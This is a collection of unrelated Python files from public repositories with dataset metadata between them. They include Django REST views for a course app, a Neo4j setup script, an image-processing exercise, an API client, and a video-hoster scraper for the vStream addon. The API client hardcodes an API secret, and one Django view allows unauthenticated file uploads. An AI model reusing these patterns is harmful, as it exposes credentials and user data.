FileSerializer, AnnoucementSerializer,\\\r\n GradeSerializer, TaskSerializer, ClassesSerializer, UserCourseSerializer, UserTasksFilesSerializer, \\\r\n StudentPresenceSerializer\r\nfrom rest_framework import status\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.parsers import MultiPartParser, FormParser\r\nfrom rest_framework.renderers import BaseRenderer\r\nfrom wsgiref.util import FileWrapper\r\n\r\n# Create your views here.\r\n\r\n\r\nclass AnnoucementAPIView(APIView):\r\n def get(self, request, id=None, id_course=None):\r\n serializer = AnnoucementSerializer()\r\n if id:\r\n articles = Annoucement.objects.get(id=id)\r\n serializer = AnnoucementSerializer(articles)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_course:\r\n articles = Annoucement.objects.filter(id_course=id_course)\r\n serializer = AnnoucementSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n else:\r\n articles = Annoucement.objects.all()\r\n serializer = AnnoucementSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass AnnoucementCreate(APIView):\r\n def post(self, request):\r\n serializer = AnnoucementSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass MessageAPIView(APIView):\r\n def get(self, request):\r\n messages = Message.objects.filter(Q(id_sender=request.user.id) | Q(id_receiver=request.user.id))\r\n serializer = MessageSerializer(messages, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\nclass MessageCreate(APIView):\r\n\r\n def post(self, request):\r\n serializer = MessageSerializer(data=request.data)\r\n # if Token.objects.filter(user = request.data['id_sender']).exist():\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass CourseAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = CourseSerializer()\r\n if id:\r\n articles = Course.objects.get(id=id)\r\n serializer = CourseSerializer(articles)\r\n else:\r\n articles = Course.objects.all()\r\n serializer = CourseSerializer(articles, many=True)\r\n return Response(serializer.data)\r\n\r\nclass CourseCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = CourseSerializer(data=request.data)\r\n if serializer.is_valid():\r\n course = serializer.save()\r\n if course:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass CourseDetails(APIView):\r\n def get_object(self, id):\r\n try:\r\n return Course.objects.get(id=id)\r\n except Course.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n def get(self, request, id):\r\n article = self.get_object(id)\r\n serializer = CourseSerializer(article)\r\n return Response(serializer.data)\r\n\r\n def put(self, request, id):\r\n article = self.get_object(id)\r\n serializer = CourseSerializer(article, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n def delete(self, request, id):\r\n article = self.get_object(id)\r\n article.delete()\r\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n\r\nclass OpinionsDetails(APIView):\r\n def get_object(self, id):\r\n try:\r\n return Opinions.objects.get(id_receiver=id)\r\n except Opinions.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n def put(self, request, id):\r\n article = self.get_object(id)\r\n serializer = OpinionsSerializer(article, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n def get(self, request, id):\r\n article = self.get_object(id)\r\n serializer = OpinionsSerializer(article)\r\n return Response(serializer.data)\r\n\r\n def delete(self, request, id):\r\n article = self.get_object(id)\r\n article.delete()\r\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n\r\nclass OpinionsAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = OpinionsSerializer()\r\n if id:\r\n articles = Opinions.objects.get(id=id)\r\n serializer = OpinionsSerializer(articles)\r\n else:\r\n articles = Opinions.objects.all()\r\n serializer = OpinionsSerializer(articles, many=True)\r\n return Response(serializer.data)\r\n\r\nclass OpinionCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = OpinionsSerializer(data=request.data)\r\n if serializer.is_valid():\r\n opinions = serializer.save()\r\n if opinions:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass FileAPIView(APIView):\r\n # permission_classes = (permissions.AllowAny,) ### to trzeba odkomentowac jak chce sie miec dostep bez tokena\r\n\r\n def get(self, request, id=None, format=None):\r\n articles = File.objects.all()\r\n serializer = FileSerializer(articles, many=True)\r\n return Response(serializer.data)\r\n\r\nclass FileDownload(APIView):\r\n class BinaryFileRenderer(BaseRenderer):\r\n media_type = 'application/octet-stream'\r\n format = None\r\n charset = None\r\n render_style = 'binary'\r\n\r\n def render(self, data, media_type=None, renderer_context=None):\r\n return data\r\n\r\n renderer_classes = (BinaryFileRenderer,)\r\n # permission_classes = (permissions.AllowAny,) ### to trzeba odkomentowac jak chce sie miec dostep bez tokena\r\n\r\n def get(self, request, id=None, format=None):\r\n obj = File.objects.get(id=id)\r\n field_object = File._meta.get_field('file')\r\n path = str(field_object.value_from_object(obj))\r\n file_name = path[path.index('files/')+6:]\r\n\r\n with open(path, 'rb') as report:\r\n return Response(\r\n report.read(),\r\n headers={\r\n 'Content-Disposition': 'attachment; filename='+file_name,\r\n \"Access-Control-Expose-Headers\": 'Content-Disposition'\r\n },\r\n content_type='application/octet-stream')\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n\r\nclass FileCreate(APIView):\r\n permission_classes = (permissions.AllowAny,) ### to trzeba odkomentowac jak chce sie miec dostep bez tokena\r\n queryset = File.objects.all()\r\n parser_classes = (FormParser, MultiPartParser)\r\n serializer_class = FileSerializer\r\n\r\n def post(self, request, filename=None, format=None):\r\n serializer = FileSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass GradeAPIView(APIView):\r\n\r\n def get(self, request, id=None, id_student=None, id_task=None, id_course=None):\r\n if id:\r\n articles = Grade.objects.get(id=id)\r\n serializer = GradeSerializer(articles)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_student and id_task:\r\n articles = Grade.objects.filter(id_student=id_student, id_task=id_task)\r\n serializer = GradeSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_student and id_course:\r\n articles = Grade.objects.filter(id_student=id_student, id_course=id_course)\r\n serializer = GradeSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_student:\r\n articles = Grade.objects.filter(id_student=id_student)\r\n serializer = GradeSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_task:\r\n articles = Grade.objects.filter(id_task=id_task)\r\n serializer = GradeSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n else:\r\n articles = Grade.objects.all()\r\n serializer = GradeSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass GradeCreate(APIView):\r\n\r\n def post(self, request, format='json'):\r\n serializer = GradeSerializer(data=request.data)\r\n if serializer.is_valid():\r\n grade = serializer.save()\r\n if grade:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass TaskAPIView(APIView):\r\n\r\n def get(self, request, id=None):\r\n serializer = TaskSerializer()\r\n if id:\r\n articles = Task.objects.get(id=id)\r\n serializer = TaskSerializer(articles)\r\n else:\r\n articles = Task.objects.all()\r\n serializer = TaskSerializer(articles, many=True)\r\n return Response(serializer.data)\r\n\r\nclass TaskCreate(APIView):\r\n\r\n def post(self, request, format='json'):\r\n serializer = TaskSerializer(data=request.data)\r\n if serializer.is_valid():\r\n task = serializer.save()\r\n if task:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass ClassesAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = ClassesSerializer()\r\n if id:\r\n classes = Classes.objects.filter(id_course=id)\r\n serializer = ClassesSerializer(classes, many=True)\r\n else:\r\n classes = Classes.objects.all()\r\n serializer = ClassesSerializer(classes, many=True)\r\n return Response(serializer.data)\r\n\r\nclass ClassesCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = ClassesSerializer(data=request.data)\r\n presence_serializer = StudentPresenceSerializer(data=request.data)\r\n if serializer.is_valid():\r\n task = serializer.save()\r\n id_course = serializer.data['id_course']\r\n id_classes = serializer.data['id']\r\n print(id_classes)\r\n user_course = UserCourse.objects.filter(id_course=id_course).values()\r\n for el in user_course:\r\n UserClasses.objects.create(id_classes=Classes.objects.get(id=id_classes),\r\n id_student=User.objects.get(id=el['id_user_id']))\r\n if task:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n# class PresenceAPIView(APIView):\r\n#\r\n# def get(self, request, id=None, id_student=None, id_course=None):\r\n# serializer = PresenceSerializer()\r\n# if id:\r\n# articles = Presence.objects.get(id=id)\r\n# serializer = PresenceSerializer(articles)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_student and id_course:\r\n# articles = Presence.objects.filter(id_student=id_student, id_course=id_course)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_student:\r\n# articles = Presence.objects.filter(id_student=id_student)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# elif id_course:\r\n# articles = Presence.objects.filter(id_course=id_course)\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# else:\r\n# articles = Presence.objects.all()\r\n# serializer = PresenceSerializer(articles, many=True)\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n#\r\n#\r\n# class PresenceCreate(APIView):\r\n# def post(self, request, format='json'):\r\n# serializer = PresenceSerializer(data=request.data)\r\n# if serializer.is_valid():\r\n# presence = serializer.save()\r\n# if presence:\r\n# json = serializer.data\r\n# return Response(json, status=status.HTTP_201_CREATED)\r\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass UserTasksFilesCreate(APIView):\r\n def post(self, request, format='json'):\r\n serializer = UserTasksFilesSerializer(data=request.data)\r\n if serializer.is_valid():\r\n new_assignment = serializer.save()\r\n if new_assignment:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\nclass UserTasksFilesAPIView(APIView):\r\n def get(self, request, id_course=None):\r\n if id_course:\r\n tasks_from_course = Task.objects.filter(id_course=id_course)\r\n tasks_ids_to_retrieve = [el.__dict__['id'] for el in tasks_from_course]\r\n articles = User_Tasks_Files.objects.filter(id_task__in = tasks_ids_to_retrieve)\r\n serializer = UserTasksFilesSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass StudentPresenceAPIView(APIView):\r\n def get(self, request, id=None):\r\n serializer = StudentPresenceSerializer()\r\n if id:\r\n presence_list = UserClasses.objects.filter(id_classes=id)\r\n serializer = StudentPresenceSerializer(presence_list, many=True)\r\n else:\r\n presence_list = UserClasses.objects.all()\r\n serializer = StudentPresenceSerializer(presence_list, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\nclass StudentPresenceAdd(APIView):\r\n def post(self, request, format='json'):\r\n serializer = StudentPresenceSerializer(data=request.data)\r\n if serializer.is_valid():\r\n new_presence = serializer.save()\r\n if new_presence:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass StudentPresenceDetails(APIView):\r\n def get_object(self, id_classes, id_student):\r\n try:\r\n return UserClasses.objects.get(Q(id_classes=id_classes) & Q(id_student=id_student))\r\n except Opinions.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n def put(self, request, id_classes, id_student):\r\n presence = self.get_object(id_classes, id_student)\r\n serializer = StudentPresenceSerializer(presence, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n def get(self, request, id_classes, id_student):\r\n presence = self.get_object(id_classes, id_student)\r\n serializer = StudentPresenceSerializer(presence)\r\n return Response(serializer.data)\r\n\r\n\r\nclass UserCourseAPIView(APIView):\r\n def get(self, request, id_user=None, id_course=None):\r\n if id_course and id_user:\r\n articles = UserCourse.objects.filter(id_user=id_user, id_course=id_course)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_user:\r\n articles = UserCourse.objects.filter(id_user=id_user)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n elif id_course:\r\n articles = UserCourse.objects.filter(id_course=id_course)\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n else:\r\n articles = UserCourse.objects.all()\r\n serializer = UserCourseSerializer(articles, many=True)\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n\r\nclass UserCourseCreate(APIView):\r\n def post(self, request):\r\n serializer = UserCourseSerializer(data=request.data)\r\n if serializer.is_valid():\r\n presence = serializer.save()\r\n if presence:\r\n json = serializer.data\r\n return Response(json, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"przemyslawmarkiewicz/projekt-io","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28404918692","text":"from neo4j_api import neo4j_connection\r\n\r\nneo4j_session = neo4j_connection.session()\r\n\r\nuser_init = 'create (n:User) set n = {email:\"ivana.zhangyf@gmail.com\", \\\r\nfirst_name:\"admin\", last_name:\"admin\", name:\"stage-admin\", path:\"users\", role:\"admin\"} return n'\r\n\r\nneo4j_session.run(user_init)\r\n\r\n\r\ndb_constraint_init = '''\r\n CREATE CONSTRAINT constraint_code\r\n ON (n:Container)\r\n ASSERT n.code IS UNIQUE\r\n'''\r\n\r\nneo4j_session.run(db_constraint_init)","repo_name":"vre-charite/dataset_neo4j","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35146230793","text":"\"\"\"change picture_id column to image_id in liked_image table\n\nRevision ID: 4eeecfcdffc8\nRevises: 98d4066f20be\nCreate Date: 2022-07-25 20:13:41.809235\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4eeecfcdffc8'\ndown_revision = '98d4066f20be'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.alter_column(\"liked_image\", \"picture_id\", new_column_name=\"image_id\")\n\n\ndef downgrade():\n op.alter_column(\"liked_image\", \"image_id\", new_column_name=\"picture_id\")\n","repo_name":"hisownspace/isntagram","sub_path":"migrations/versions/20220725_201341_.py","file_name":"20220725_201341_.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12983654509","text":"#run `pip install pillow` before\n#make sure you have `requests` lib installed\n#use https://pillow.readthedocs.io/en/stable/handbook/tutorial.html for reference\n\nfrom PIL import Image\nimport requests\nimport os\nimport threading\n\n\nURL = 'https://lp-cms-production.imgix.net/2019-06/4871827ef10d74079fb636806d371ccc-brighton-hove.jpg'\nURL2 = 'https://vjoy.cc/wp-content/uploads/2020/09/bezymyannyjkvytstsk.jpg'\nURL3 = 'https://i.pinimg.com/736x/95/30/41/953041070f000d45c05c912005f63724.jpg'\nURL5 = 'https://mirpozitiva.ru/wp-content/uploads/2019/11/1472042719_15.jpg'\n\ndef load_image(url, file_name='example.jpg'):\n with Image.open(requests.get(url, stream=True).raw) as image:\n image.save(os.path.join(os.getcwd(), file_name))\n\n\n\ndef print_image_data(file):\n image = Image.open(file)\n print(image.size, image.mode)\n\ndef is_square_image(file):\n image = Image.open(file)\n return image.size[0] == image.size[1]\n\ndef create_thumbnail(file):\n '''# TODO: handle all errors on thumbnail creation'''\n thumbnail_size = (200, 200)\n image = Image.open(file)\n image.thumbnail(thumbnail_size)\n image.save('thumbnail.jpg', 'JPEG')\n\ndef is_thumbnail(file):\n thumbnail_size = [200, 200]\n image = Image.open(file)\n return image.size == thumbnail_size\n\ndef rotate_image(file, degrees):\n image = Image.open(file)\n rotated = image.rotate(degrees)\n rotated.save('rotated.jpg')\n\ndef flip_image(file, direction):\n directions = {'LT': Image.FLIP_LEFT_RIGHT, 'TB': Image.FLIP_TOP_BOTTOM}\n image = Image.open(file)\n out = image.transpose(directions[direction])\n out.save('flipped.jpg')\n\ndef copy_images_to_dir(dirname):\n '''Copies all images from current folder into subfolder'''\n path = os.path.join(os.getcwd())\n for file in os.listdir(path):\n try:\n image = Image.open(file)\n image.save(os.path.join(os.getcwd(), dirname, image.filename))\n except:\n break\n\ndef delete_images(path=os.path.join(os.getcwd())):\n for file in os.listdir(path):\n if file.endswith('.jpg'):\n os.remove(file)\n\n''' TODO: create a function that will save rectangle area from given image to the separate file'''\n# with name 'rectangle.jpg'. Coordinates of rectangle have to be passed as tuple of 4 integers\ndef rectangular_area(file):\n path = os.path.join(os.getcwd(), 'images', file)\n box = (500, 150, 600, 300)\n with Image.open(path) as image:\n im_crop = image.crop(box)\n im_crop.save('rectangle.jpg', quality=95)\n\n\n\n\nif __name__ == '__main__':\n load_img = threading.Thread(target=load_image, args=(URL, 'img1.jpg'))\n load_img2 = threading.Thread(target=load_image, args=(URL2, 'img2.jpg'))\n load_img3 = threading.Thread(target=load_image, args=(URL3,'img3.jpg'))\n # load_img4 = threading.Thread(target=load_image, args=(URL4, 'img4.jpg'))\n load_img5 = threading.Thread(target=load_image, args=(URL5, 'img5.jpg'))\n load_img.start()\n load_img2.start()\n load_img3.start()\n # load_img4.start()\n load_img5.start()\n # load_image(URL)\n # print_image_data('example.jpg')\n # print(is_square_image('example.jpg'))\n # create_thumbnail('example.jpg')\n # print(is_thumbnail('thumbnail.jpg'))\n # rotate_image('images/example.jpg', 45)\n # flip_image('example.jpg', 'LT')\n # copy_images_to_dir('images')\n # delete_images()\n # rectangular_area('example.jpg')\n print('Done!')\n","repo_name":"RomanenkoDmitriy/schoolwork","sub_path":"lesson/lesson34/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1893758285","text":"# -*- coding: utf8 -*-\nimport logging\nimport time\nimport hashlib\nimport urllib2\nimport json\nimport urllib\n\nclass TaodianApi:\n\tappkey = \"63\"\n\tappSecret = \"c8bdecf1d3778e3a463475290886aa58\"\n\tapiUrl = \"http://api2.zaol.cn/api/route\"\n\tdef __init__(self):\n\t\tself.logger = logging.getLogger(\"click\")\n\t\t\n\t\tself.logger.info(\"the logger test\")\n\t\ttry:\n\t\t\tsetting = open(\"TaodianApi.conf\",\"r\")\n\t\t\ttry:\n\t\t\t\tline = setting.readline()\n\t\t\t\twhile line:\n\t\t\t\t\tdata = line.split(\"=\", 1)\n\t\t\t\t\tif data[0] == \"td_api_id\":\n\t\t\t\t\t\tself.appkey = data[1]\n\t\t\t\t\t\tself.logger.info(\"the appkey:%s\" % self.appkey)\n\t\t\t\t\tif data[0] == \"td_api_secret\":\n\t\t\t\t\t\tself.appSecret = data[1]\n\t\t\t\t\tline = setting.readline()\n\t\t\texcept:\n\t\t\t\tself.logger.info(\"read file error\")\n\t\t\tfinally:\n\t\t\t\tsetting.close()\n\t\texcept:\n\t\t\tself.logger.info(\"no found 'TaodianApi.conf'\")\n\t\n\tdef call(self, api, param):\n\t\tp = self.getSign()\n\t\tp[\"name\"] = api\n\t\tp[\"params\"] = json.dumps(param)\n\t\tfd = urllib2.urlopen(self.apiUrl,data = urllib.urlencode(p))\n\t\tresult = fd.read()\n\t\tfd.close()\n\t\t\n\t\treturn json.loads(result)\n\t\t\n\t\t\n\t\t\n\tdef getSign(self):\n\t\t\n\t\tstamp = time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time()))\n\t\tsignStr = self.appkey +\",\"+ stamp +\",\"+self.appSecret\n\t\t\n\t\tsign = hashlib.md5(signStr).hexdigest()\n\t\t\n\t\tp = {\"app_id\":self.appkey, \"time\":stamp, \"sign\":sign}\n\t\t\n\t\treturn p\n\t\t\n\n\n","repo_name":"emop/webrobot","sub_path":"sina_empower/libs/TaodianApi.py","file_name":"TaodianApi.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"45485891388","text":"import sys\n\ndef checkForOverlap(pair):\n comma = pair.find(',')\n elf1 = pair[0:comma]\n elf2 = pair[comma+1:]\n\n dash1 = elf1.find('-')\n elf1start = int(elf1[0:dash1])\n elf1end = int(elf1[dash1+1:])\n dash2 = elf2.find('-')\n elf2start = int(elf2[0:dash2])\n elf2end = int(elf2[dash2+1:])\n\n if ( (elf2start <= elf1start <= elf2end) or \\\n (elf2start <= elf1end <= elf2end) or \\\n (elf1start <= elf2start <= elf1end) or \\\n (elf1start <= elf2end <= elf1end) ):\n return True\n else:\n return False\n\nif __name__ == '__main__':\n totalOverlap = 0\n with open('4.txt', 'r') as file:\n lines = file.readlines()\n for pair in lines:\n if (checkForOverlap(pair.strip())):\n totalOverlap += 1\n\n print(totalOverlap)","repo_name":"wpgrant/aoc","sub_path":"2022/4b.py","file_name":"4b.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32691950179","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n# https://playtube.ws/embed-xxxxx.html\nimport re\n\nfrom resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.lib.parser import cParser\nfrom resources.hosters.hoster import iHoster\nfrom resources.lib.comaddon import dialog\nfrom resources.lib.packer import cPacker\n\nUA = 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'\n\n\nclass cHoster(iHoster):\n\n def __init__(self):\n iHoster.__init__(self, 'playtube', 'Playtube')\n\n def _getMediaLinkForGuest(self):\n oRequestHandler = cRequestHandler(self._url)\n sHtmlContent = oRequestHandler.request()\n\n sPattern2 = '(\\s*eval\\s*\\(\\s*function(?:.|\\s)+?\\)\\)\\))'\n aResult = re.findall(sPattern2, sHtmlContent)\n list_url = []\n list_qua = []\n if aResult:\n str2 = aResult[0]\n if not str2.endswith(';'):\n str2 = str2 + ';'\n\n strs = cPacker().unpack(str2)\n oParser = cParser()\n sPattern = '(https.+?.m3u8)'\n aResult = re.findall(sPattern, strs)\n if aResult:\n urlhost = aResult[0]\n oRequestHandler = cRequestHandler(urlhost)\n oRequestHandler.addHeaderEntry('User-Agent', UA)\n oRequestHandler.addHeaderEntry('Referer', self._url)\n sHtmlContent2 = oRequestHandler.request()\n oParser = cParser()\n sPattern = 'PROGRAM.*?BANDWIDTH.*?RESOLUTION=(\\d+x\\d+).*?(https.*?m3u8)'\n aResult = oParser.parse(sHtmlContent2, sPattern)\n if aResult[0] is True:\n for aEntry in aResult[1]:\n list_url.append(aEntry[1])\n list_qua.append(aEntry[0])\n\n api_call = dialog().VSselectqual(list_qua, list_url)\n\n if api_call:\n return True, api_call + '|User-Agent=' + UA + '&Referer=' + self._url\n\n return False, False\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/hosters/playtube.py","file_name":"playtube.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"35984776578","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('',views.index, name = 'index'),\n path('index.html',views.index, name = 'index'),\n path('juego.html',views.juego, name = 'juego'),\n path('estadistica.html',views.estadistica, name = 'estadistica'),\n path('mi_estadistica.html',views.mi_estadistica, name = 'mi_estadistica'),\n path('stem.html',views.stem, name = 'stem'),\n path('SendLoginData',views.SendLoginData, name='SendLoginData'),\n path('StartSession',views.StartSession, name='StartSession'),\n path('AddTry',views.AddTry, name='AddTry'),\n path('AddDay',views.AddDay, name='AddDay'),\n path('UpdateTry',views.UpdateTry, name='UpdateTry'),\n path('UpdateSession',views.UpdateSession, name='UpdateSession'),\n path('minutosJugadosTotales',views.minutosJugadosTotales, name='minutosJugadosTotales'),\n path('minutosJugadosPromedio',views.minutosJugadosPromedio, name='minutosJugadosPromedio'),\n path('formulario',views.formulario, name='formulario'),\n\n]\n\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n","repo_name":"llFCAxelentell/WebSTEM","sub_path":"WEB/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6030224996","text":"def is_balanced(expression):\n stack = []\n brackets = {')': '(', '}': '{', ']': '['}\n for char in expression:\n if char in brackets.values():\n stack.append(char)\n elif char in brackets.keys():\n if stack == [] or brackets[char] != stack.pop():\n return False\n return stack == []\n\n\ndef remove_duplicates(sequence):\n result = []\n seen = set()\n for item in sequence:\n if item not in seen:\n result.append(item)\n seen.add(item)\n return result\n\n\n\ndef word_frequency(sentence):\n words = sentence.split()\n frequency = {}\n \n for word in words:\n if word in frequency:\n frequency[word] += 1\n else:\n frequency[word] = 1\n \n return frequency","repo_name":"Barasa-Micah/Data-Structures","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31230992341","text":"from future.utils import iteritems\n\nfrom . import parsetools as pt\n\ndef cardChunk(key, chunk):\n \"\"\"\n Parse Card Chunk Method\n \"\"\"\n for line in chunk:\n values = []\n sline = line.strip().split()\n\n for idx in range(1, len(sline)):\n values.append(sline[idx])\n\n return {'card': sline[0],\n 'values': values}\n\ndef connectChunk(key, chunk):\n \"\"\"\n Parse Card Chunk Method\n \"\"\"\n upLinks = []\n schunk = chunk[0].strip().split()\n\n for idx in range(4, len(schunk)):\n upLinks.append(schunk[idx])\n\n result = {'link': schunk[1],\n 'downLink': schunk[2],\n 'numUpLinks': schunk[3],\n 'upLinks': upLinks}\n\n return result\n\ndef linkChunk(key, chunk):\n \"\"\"\n Parse LINK Chunk Method\n \"\"\"\n # Extract link type card\n linkType = chunk[1].strip().split()[0]\n\n # Cases\n if linkType == 'DX':\n # Cross section link type handler\n result = xSectionLink(chunk)\n\n elif linkType == 'STRUCTURE':\n # Structure link type handler\n result = structureLink(chunk)\n\n elif linkType in ('RESERVOIR', 'LAKE'):\n # Reservoir link type handler\n result = reservoirLink(chunk)\n return result\n\ndef structureLink(lines):\n \"\"\"\n Parse STRUCTURE LINK Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'STRUCTURE',\n 'NUMSTRUCTS',\n 'STRUCTTYPE')\n\n WEIR_KEYWORDS = ('STRUCTTYPE',\n 'CREST_LENGTH',\n 'CREST_LOW_ELEV',\n 'DISCHARGE_COEFF_FORWARD',\n 'DISCHARGE_COEFF_REVERSE',\n 'CREST_LOW_LOC',\n 'STEEP_SLOPE',\n 'SHALLOW_SLOPE')\n\n CULVERT_KEYWORDS = ('STRUCTTYPE',\n 'UPINVERT',\n 'DOWNINVERT',\n 